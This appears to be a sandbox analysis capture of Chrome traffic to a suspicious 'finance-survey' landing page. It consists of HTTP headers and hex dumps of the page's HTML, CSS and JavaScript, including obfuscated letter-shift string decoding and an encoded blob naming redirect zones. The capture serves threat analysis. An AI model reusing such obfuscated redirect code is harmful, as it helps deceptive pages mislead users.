                                                                                                          Timing-Allow-Origin: *
                                                                                                          Set-Cookie: OAID=1a27c2cdff9544dd8c9db6d1fe163714; expires=Tue, 06 Jan 2026 11:09:18 GMT; path=/; secure; SameSite=None
                                                                                                          2025-01-06 11:09:18 UTC346INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6f 61 69 64 74 73 3d 31 37 33 36 31 36 31 37 35 38 3b 20 65 78 70 69 72 65 73 3d 54 75 65 2c 20 30 36 20 4a 61 6e 20 32 30 32 36 20 31 31 3a 30 39 3a 31 38 20 47 4d 54 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 73 79 6e 63 65 64 43 6f 6f 6b 69 65 3d 3b 20 65 78 70 69 72 65 73 3d 54 75 65 2c 20 31 30 20 4e 6f 76 20 32 30 30 39 20 32 33 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 31 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20
                                                                                                          Data Ascii: Set-Cookie: oaidts=1736161758; expires=Tue, 06 Jan 2026 11:09:18 GMT; path=/; secure; SameSite=NoneSet-Cookie: syncedCookie=; expires=Tue, 10 Nov 2009 23:00:00 GMTStrict-Transport-Security: max-age=1X-Content-Type-Options: nosniffCF-Cache-Status:


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          20192.168.2.450062104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:19 UTC852OUTGET /finance-survey/272/?svar=1736161758&ssk=7cd32637808ffb7eb68676c4facb26c7&ssk2=6eef4467b47effe6659448a630f4cafb&s=900090192959910233&var=615-538bd0d9&ymid=2de718&z=8645117&var_3=M7456757949717807127&rdk=rk3 HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:19 UTC458INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:19 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          CF-Ray: 8fdb415548ba8c33-EWR
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1248
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:19 GMT
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:44 GMT
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          Vary: Accept-Encoding
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Server: cloudflare
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:19 UTC911INData Raw: 37 64 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 76 65 72 73 69 6f 6e 3d 22 76 30 2e 36 2e 32 35 37 2d 64 6f 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6e 65 78 74 2d 68 65 61 64 2d 63 6f 75 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 32 22 2f 3e 3c 73 74 79 6c 65 20 64 61 74 61 2d 73 74 79 6c 65 64 20 64 61 74 61 2d 73 74 79 6c 65 64 2d 76 65 72 73 69 6f 6e 3d 22 36 2e 31 2e 31 33 22 3e 2e 6a 4e 6b 58 70 47 7b 68 65 69 67 68 74 3a 31 30 30 25 3b
                                                                                                          Data Ascii: 7de5<!DOCTYPE html><html lang="en" data-version="v0.6.257-do"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width"/><meta name="next-head-count" content="2"/><style data-styled data-styled-version="6.1.13">.jNkXpG{height:100%;
                                                                                                          2025-01-06 11:09:19 UTC1369INData Raw: 20 20 20 20 20 38 25 2c 0a 20 20 20 20 23 34 30 34 30 34 30 0a 20 20 20 20 20 20 31 38 25 2c 0a 20 20 20 20 23 35 38 35 38 35 38 20 33 33 25 0a 20 20 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 38 30 72 65 6d 20 31 30 30 25 3b 61 6e 69 6d 61 74 69 6f 6e 3a 4f 52 65 64 68 20 31 2e 35 73 20 69 6e 66 69 6e 69 74 65 20 6c 69 6e 65 61 72 20 66 6f 72 77 61 72 64 73 3b 7d 2f 2a 21 73 63 2a 2f 0a 64 61 74 61 2d 73 74 79 6c 65 64 2e 67 32 39 5b 69 64 3d 22 73 63 2d 35 61 66 62 39 30 31 2d 30 22 5d 7b 63 6f 6e 74 65 6e 74 3a 22 6a 4e 6b 58 70 47 2c 66 4d 53 58 57 72 2c 6a 77 69 4c 78 62 2c 22 7d 2f 2a 21 73 63 2a 2f 0a 2e 69 61 54 4f 58 68 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6a 75 73
                                                                                                          Data Ascii: 8%, #404040 18%, #585858 33% );background-size:80rem 100%;animation:ORedh 1.5s infinite linear forwards;}/*!sc*/data-styled.g29[id="sc-5afb901-0"]{content:"jNkXpG,fMSXWr,jwiLxb,"}/*!sc*/.iaTOXh{display:flex;flex-direction:column;jus
                                                                                                          2025-01-06 11:09:19 UTC1369INData Raw: 67 68 74 3a 31 35 30 25 3b 7d 2f 2a 21 73 63 2a 2f 0a 64 61 74 61 2d 73 74 79 6c 65 64 2e 67 31 39 30 5b 69 64 3d 22 73 63 2d 65 35 36 32 62 32 36 65 2d 35 22 5d 7b 63 6f 6e 74 65 6e 74 3a 22 68 6c 69 78 44 51 2c 22 7d 2f 2a 21 73 63 2a 2f 0a 2e 6b 54 45 6a 57 76 7b 63 6f 6c 6f 72 3a 23 38 65 39 36 61 35 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 3b 66 6c 65 78 3a 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 25 3b 7d 2f 2a 21 73 63 2a 2f 0a 64 61 74 61 2d 73 74 79 6c 65 64 2e 67 31 39 31 5b 69 64 3d 22 73 63 2d 65 35 36 32 62 32 36 65 2d 36 22 5d 7b 63 6f 6e 74 65 6e 74 3a 22 6b 54 45 6a 57 76 2c
                                                                                                          Data Ascii: ght:150%;}/*!sc*/data-styled.g190[id="sc-e562b26e-5"]{content:"hlixDQ,"}/*!sc*/.kTEjWv{color:#8e96a5;text-align:right;flex:1;font-size:12px;font-style:normal;font-weight:400;line-height:150%;}/*!sc*/data-styled.g191[id="sc-e562b26e-6"]{content:"kTEjWv,
                                                                                                          2025-01-06 11:09:19 UTC1369INData Raw: 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 3b 7d 2f 2a 21 73 63 2a 2f 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 33 30 30 70 78 29 7b 2e 63 73 4a 41 5a 73 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 7d 7d 2f 2a 21 73 63 2a 2f 0a 64 61 74 61 2d 73 74 79 6c 65 64 2e 67 32 30 31 5b 69 64 3d 22 73 63 2d 33 31 61 66 38 63 31 31 2d 31 22 5d 7b 63 6f 6e 74 65 6e 74 3a 22 63 73 4a 41 5a 73 2c 22 7d 2f 2a 21 73 63 2a 2f 0a 2e 6b 75 6e 57 57 4b 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 3b 67 61 70 3a 31 31 70 78 3b 7d 2f 2a 21 73 63 2a 2f 0a 64 61 74 61 2d 73 74 79 6c 65 64 2e 67 32 30 33 5b 69 64 3d 22 73 63 2d 33 31 61 66 38 63 31 31 2d 33 22 5d 7b 63 6f 6e 74 65 6e 74 3a 22 6b 75 6e 57 57 4b
                                                                                                          Data Ascii: rgin-right:10px;}/*!sc*/@media (min-width: 300px){.csJAZs{flex-direction:row;}}/*!sc*/data-styled.g201[id="sc-31af8c11-1"]{content:"csJAZs,"}/*!sc*/.kunWWK{display:flex;padding:12px;gap:11px;}/*!sc*/data-styled.g203[id="sc-31af8c11-3"]{content:"kunWWK
                                                                                                          2025-01-06 11:09:19 UTC1369INData Raw: 6d 61 72 67 69 6e 3a 30 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 7d 2f 2a 21 73 63 2a 2f 0a 64 61 74 61 2d 73 74 79 6c 65 64 2e 67 32 31 35 5b 69 64 3d 22 73 63 2d 33 31 61 66 38 63 31 31 2d 31 35 22 5d 7b 63 6f 6e 74 65 6e 74 3a 22 68 74 55 51 7a 5a 2c 22 7d 2f 2a 21 73 63 2a 2f 0a 2e 6b 48 5a 4e 4c 54 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 67 61 70 3a 31 2e 31 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 20 30 2e 31 72 65 6d 3b 7d 2f 2a 21 73 63 2a 2f 0a 40 6d 65 64 69 61 20 28 6d 69 6e
                                                                                                          Data Ascii: margin:0;direction:ltr;text-align:left;}/*!sc*/data-styled.g215[id="sc-31af8c11-15"]{content:"htUQzZ,"}/*!sc*/.kHZNLT{display:flex;flex-direction:column;justify-content:center;align-items:start;gap:1.1rem;width:100%;padding:0 0.1rem;}/*!sc*/@media (min
                                                                                                          2025-01-06 11:09:19 UTC1369INData Raw: 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 3b 7d 2f 2a 21 73 63 2a 2f 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 34 38 30 70 78 29 7b 2e 6b 57 49 61 46 52 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 7d 7d 2f 2a 21 73 63 2a 2f 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 7b 2e 6b 57 49 61 46 52 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 6d 61 72 67 69 6e 3a 32 30 70 78 20 30 3b 7d 7d 2f 2a 21 73 63 2a 2f 0a 2e 6b 57 49 61 46 52 20 68 32 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c
                                                                                                          Data Ascii: m;font-weight:700;text-align:center;margin:0 0 15px;}/*!sc*/@media (min-width: 480px){.kWIaFR h1{font-size:25px;}}/*!sc*/@media (min-width: 768px){.kWIaFR h1{font-size:30px;margin:20px 0;}}/*!sc*/.kWIaFR h2{color:#fff;font-size:0.9rem;font-weight:400;l
                                                                                                          2025-01-06 11:09:19 UTC1369INData Raw: 20 73 65 72 76 69 63 65 73 2e 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 2f 3e 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 70 72 6f 63 65 73 73 20 3d 20 7b 22 65 6e 76 22 3a 7b 22 4e 45 58 54 5f 50 55 42 4c 49 43 5f 45 4e 56 22 3a 22 70 72 6f 64 75 63 74 69 6f 6e 22 7d 7d 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 6c 65 74 20 6c 61 6e 64 44 61 74 61 20 3d 20 22 65 79 4a 70 5a 43 49 36 4d 6a 63 79 4c 43 4a 77 63 6d 39 71 5a 57 4e 30 49 6a 6f 69 5a 47 38 69 4c 43 4a 73 59 57 35 6b 61 57 35 6e 54 6d 46 74 5a 53 49 36 49 6d 5a 70 62 6d 46 75 59 32 55 74 63 33 56 79 64 6d 56 35 49 69 77 69 61 58 4e 45 5a 58 5a 6c 62 47 39 77 62 57 56 75 64 43 49 36 5a 6d 46
                                                                                                          Data Ascii: services."/><meta name="referrer" content="no-referrer"/><script>const process = {"env":{"NEXT_PUBLIC_ENV":"production"}};</script><script>let landData = "eyJpZCI6MjcyLCJwcm9qZWN0IjoiZG8iLCJsYW5kaW5nTmFtZSI6ImZpbmFuY2Utc3VydmV5IiwiaXNEZXZlbG9wbWVudCI6ZmF
                                                                                                          2025-01-06 11:09:19 UTC1369INData Raw: 6a 4d 32 4d 69 77 69 61 57 5a 79 59 57 31 6c 55 32 31 68 62 47 78 58 61 57 35 6b 62 33 63 69 4f 6a 63 30 4e 6a 49 7a 4e 54 67 73 49 6d 52 6c 5a 6d 46 31 62 48 52 61 62 32 35 6c 49 6a 6f 32 4e 6a 45 34 4f 54 41 34 4c 43 4a 77 63 6d 39 34 65 53 49 36 4e 6a 63 32 4f 54 6b 78 4e 79 77 69 62 57 46 70 62 6b 56 34 61 58 51 69 4f 6a 59 32 4d 54 67 34 4f 54 67 73 49 6e 52 6c 5a 57 34 69 4f 6a 59 32 4d 54 67 34 4f 54 6b 73 49 6d 35 76 62 6c 56 75 61 58 46 31 5a 53 49 36 4e 6a 59 78 4f 44 6b 77 4d 43 77 69 62 6d 39 75 56 57 35 70 63 58 56 6c 56 47 56 6c 62 69 49 36 4e 6a 59 78 4f 44 6b 77 4d 53 77 69 61 57 35 42 63 48 41 69 4f 6a 59 32 4d 54 67 35 4d 44 49 73 49 6d 4a 68 59 32 74 4a 62 6b 46 77 63 43 49 36 4e 6a 67 33 4f 44 67 33 4f 53 77 69 59 6d 46 6a 61 31 4a 6c
                                                                                                          Data Ascii: jM2MiwiaWZyYW1lU21hbGxXaW5kb3ciOjc0NjIzNTgsImRlZmF1bHRab25lIjo2NjE4OTA4LCJwcm94eSI6Njc2OTkxNywibWFpbkV4aXQiOjY2MTg4OTgsInRlZW4iOjY2MTg4OTksIm5vblVuaXF1ZSI6NjYxODkwMCwibm9uVW5pcXVlVGVlbiI6NjYxODkwMSwiaW5BcHAiOjY2MTg5MDIsImJhY2tJbkFwcCI6Njg3ODg3OSwiYmFja1Jl
                                                                                                          2025-01-06 11:09:19 UTC1369INData Raw: 6f 6e 73 6f 6c 65 5b 78 2e 76 5d 28 78 2e 6e 29 2c 74 3b 74 72 79 7b 63 6f 6e 73 74 20 74 3d 5b 78 2e 4d 2c 78 2e 6a 2c 78 2e 4b 2c 78 2e 78 5d 3b 72 65 74 75 72 6e 20 79 69 65 6c 64 20 6e 5b 78 2e 63 5d 5b 78 2e 75 5d 28 74 29 7d 63 61 74 63 68 28 6e 29 7b 72 65 74 75 72 6e 20 63 6f 6e 73 6f 6c 65 5b 78 2e 76 5d 28 78 2e 7a 2c 6e 29 2c 74 7d 7d 2c 6e 65 77 28 65 7c 7c 28 65 3d 50 72 6f 6d 69 73 65 29 29 28 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 6e 29 7b 74 72 79 7b 75 28 72 5b 78 2e 47 5d 28 6e 29 29 7d 63 61 74 63 68 28 6e 29 7b 61 28 6e 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 6e 29 7b 74 72 79 7b 75 28 72 5b 78 2e 48 5d 28 6e 29 29 7d 63 61 74 63 68 28 6e 29 7b 61 28 6e 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 6e
                                                                                                          Data Ascii: onsole[x.v](x.n),t;try{const t=[x.M,x.j,x.K,x.x];return yield n[x.c][x.u](t)}catch(n){return console[x.v](x.z,n),t}},new(e||(e=Promise))(function(t,a){function i(n){try{u(r[x.G](n))}catch(n){a(n)}}function c(n){try{u(r[x.H](n))}catch(n){a(n)}}function u(n
                                                                                                          2025-01-06 11:09:19 UTC1369INData Raw: 29 3d 3e 74 79 70 65 6f 66 20 69 5b 31 5d 21 3d 3d 27 73 74 72 69 6e 67 27 3f 69 5b 31 5d 3a 69 5b 31 5d 2e 73 70 6c 69 74 28 27 27 29 2e 6d 61 70 28 73 3d 3e 7b 63 6f 6e 73 74 20 63 3d 73 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 3b 72 65 74 75 72 6e 20 63 3e 3d 36 35 26 26 63 3c 3d 39 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 28 63 2d 36 35 2b 32 36 2d 31 32 29 25 32 36 2b 36 35 29 3a 63 3e 3d 39 37 26 26 63 3c 3d 31 32 32 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 28 63 2d 39 37 2b 32 36 2d 31 32 29 25 32 36 2b 39 37 29 3a 73 7d 29 2e 6a 6f 69 6e 28 27 27 29 7d 29 2c 6f 29 2c 7b 7d 29 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 4b 29 7b 21 66 75 6e 63 74 69 6f 6e 28
                                                                                                          Data Ascii: )=>typeof i[1]!=='string'?i[1]:i[1].split('').map(s=>{const c=s.charCodeAt(0);return c>=65&&c<=90?String.fromCharCode((c-65+26-12)%26+65):c>=97&&c<=122?String.fromCharCode((c-97+26-12)%26+97):s}).join('')}),o),{})))</script><script>(function(K){!function(


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          21192.168.2.450065104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:20 UTC534OUTGET /_next/static/css/0bc0cde260d08b97.css HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:20 UTC481INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:20 GMT
                                                                                                          Content-Type: text/css
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-733"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1053
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:20 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415a6ed742f4-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:20 UTC888INData Raw: 37 33 33 0d 0a 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 38 2e 30 2e 31 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 3b 6d 61 72 67 69 6e 3a 2e 36 37 65 6d 20 30 7d 68 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 70 72 65 7b 66
                                                                                                          Data Ascii: 733/*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}main{display:block}h1{font-size:2em;margin:.67em 0}hr{box-sizing:content-box;height:0;overflow:visible}pre{f
                                                                                                          2025-01-06 11:09:20 UTC962INData Raw: 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 2c 62 75 74 74 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 7d 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67
                                                                                                          Data Ascii: et],[type=submit],button{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring
                                                                                                          2025-01-06 11:09:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          22192.168.2.450070104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:20 UTC553OUTGET /_next/static/chunks/3cacc58ea516fe6f-1736072686539.4d666b3ce7dcd66f.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:20 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:20 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-7553"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1053
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:20 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415a6f5342b2-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:20 UTC873INData Raw: 37 35 35 33 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 31 36 35 38 5d 2c 7b 38 38 36 36 35 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 29 7b 76 61 72 20 6f 3d 72 3f 72 2e 63 61 6c 6c 28 6e 2c 65 2c 74 29 3a 76 6f 69 64 20 30 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 29 72 65 74 75 72 6e 21 21 6f 3b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 21 65 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 3d 74 79 70 65 6f 66 20 74 7c 7c 21 74 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 73 3d
                                                                                                          Data Ascii: 7553(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[81658],{88665:function(e){e.exports=function(e,t,r,n){var o=r?r.call(n,e,t):void 0;if(void 0!==o)return!!o;if(e===t)return!0;if("object"!==typeof e||!e||"object"!==typeof t||!t)return!1;var s=
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 5b 6f 5d 3d 74 5b 6f 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 3b 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 72 29 7b 69 66 28 72 7c 7c 32 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 66 6f 72 28 76 61 72 20 6e 2c 6f 3d 30 2c 73 3d 74 2e 6c 65 6e 67 74 68 3b 6f 3c 73 3b 6f 2b 2b 29 21 6e 26 26 6f 20 69 6e 20 74 7c 7c 28 6e 7c 7c 28 6e 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 2c 30 2c 6f 29 29 2c 6e 5b 6f 5d 3d 74 5b 6f 5d 29 3b 72 65 74 75 72 6e 20 65 2e 63 6f 6e 63 61 74 28 6e 7c 7c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 29 29 7d 4f 62 6a
